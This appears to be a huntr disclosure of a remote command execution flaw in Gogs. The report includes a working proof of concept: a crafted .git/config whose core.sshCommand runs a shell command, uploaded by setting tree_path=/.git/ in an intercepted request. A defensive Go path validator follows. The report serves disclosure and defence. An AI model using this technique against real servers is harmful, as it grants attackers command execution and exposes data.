huntr Wuhan005 B4928CFE-4110-462F-A180-6D5673797902
History: Mar 11, 2022 - 3:27 p.m.

Remote Command Execution in uploading repository file

2022-03-11 15:27:27
wuhan005
www.huntr.dev
10

EPSS: 0.118 Low

Percentile: 95.3%

Description

When uploading a file to a repository in Gogs, the tree_path parameter is not validated. An attacker can set tree_path=/.git/ to upload a file into the .git directory.

By overwriting the .git/config file and setting core.sshCommand, the attacker achieves remote command execution.

Proof of Concept

Create a repository in Gogs and upload a file named config to the repository through the web page:

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	ignorecase = true
	precomposeunicode = true
	sshCommand = echo pwnned > /tmp/poc
[remote "origin"]
	url = [email protected]:torvalds/linux.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master

Intercept the HTTP POST request that submits the form, and set the parameter tree_path=/.git/ in the request body.

A file containing the text pwnned is then created at /tmp/poc.

Impact

This vulnerability allows an attacker to execute commands on the remote server and gain access to the privileged user account, which leads to sensitive data exposure, identity theft, etc.
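
The kind of tree_path check whose absence the description reports, as an added example (not Gogs' code and not part of the original report). CleanTreePath and ErrGitPath are hypothetical names, and the matching rules (case-insensitive, backslash and trailing dot/space handling) are an assumed conservative policy.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

// ErrGitPath: the upload target would land inside Git metadata.
var ErrGitPath = errors.New("tree path targets the .git directory")

// CleanTreePath (hypothetical helper, not Gogs' code) normalizes a
// user-supplied tree_path and rejects any ".git" path component.
func CleanTreePath(treePath string) (string, error) {
	// Treat backslashes as separators so a\.git\config is caught too.
	p := strings.ReplaceAll(treePath, `\`, "/")
	// Anchor at "/" before cleaning so ".." cannot climb above the root.
	p = strings.TrimPrefix(path.Clean("/"+p), "/")
	for _, part := range strings.Split(p, "/") {
		// Assumed policy: compare case-insensitively and ignore trailing
		// dots/spaces, which some filesystems fold into the same name.
		if strings.ToLower(strings.TrimRight(part, ". ")) == ".git" {
			return "", ErrGitPath
		}
	}
	return p, nil
}

func main() {
	// Constructed sample inputs; the first is the value from the report.
	for _, in := range []string{"/.git/", "docs/../.GIT/hooks", ".github/workflows", "docs/img"} {
		clean, err := CleanTreePath(in)
		fmt.Printf("%-22q -> %q, err=%v\n", in, clean, err)
	}
}
```

Run the check on the full destination (tree_path joined with the uploaded file name) before anything is written to the server-side working copy.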